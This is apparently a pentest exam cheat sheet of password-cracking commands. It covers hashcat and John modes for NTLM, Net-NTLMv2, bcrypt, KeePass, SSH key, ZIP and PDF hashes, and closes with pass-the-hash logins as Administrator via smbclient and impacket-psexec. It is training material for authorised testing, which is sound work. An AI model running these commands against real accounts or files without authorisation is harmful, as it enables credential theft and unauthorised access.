Password Cracking
Focused on real-world cracking during exams.
Cracking MD5 / SHA1 Hashes
Use rockyou.txt and check if the password is in the default wordlist.
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --force
Rule-Based Attack with Hashcat
Mutate wordlist entries to match password policies (digits, caps, symbols).
hashcat -m 0 hash.txt rockyou.txt -r demo.rule --force
Brute-Force Attack
Try all alphanumeric combinations of a given length.
hashcat -m 0 hash.txt -a 3 ?a?a?a?a?a --force
Crack KeePass .kdbx
Database
.kdbx
DatabaseExtract hash using keepass2john and crack with hashcat.
keepass2john db.kdbx > keepass.hash
hashcat -m 13400 keepass.hash rockyou.txt --force
Crack SSH Private Key Passphrase
Convert with ssh2john and crack with John or Hashcat (if supported).
ssh2john id_rsa > ssh.hash
john --wordlist=ssh.passwords --rules=sshRules ssh.hash
Crack NTLM Hashes
Mode -m 1000
for NTLM hashes.
hashcat -m 1000 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Crack Net-NTLMv2 Hashes
Captured via responder or relays; use mode -m 5600
.
hashcat -m 5600 ntlmv2.hash wordlist.txt --force
Crack bcrypt (mode 3200)
Used in some CMS platforms or modern Linux user hashes.
hashcat -m 3200 bcrypt.hash rockyou.txt --force
Crack ZIP File Passwords
Convert ZIP to hash using zip2john and crack it.
zip2john secret.zip > zip.hash
hashcat -m 13600 zip.hash rockyou.txt --force
Crack PDF File Passwords
Convert PDF to hash using pdf2john and crack with hashcat.
pdf2john.py secret.pdf > pdf.hash
hashcat -m 10500 pdf.hash rockyou.txt --force
Pass-the-Hash (NTLM SMB / WinRM)
Use valid hash to authenticate without cracking.
smbclient \\target\share -U Administrator --pw-nt-hash <NTLM_HASH>
impacket-psexec -hashes :<NTLM_HASH> Administrator@target-ip
Last updated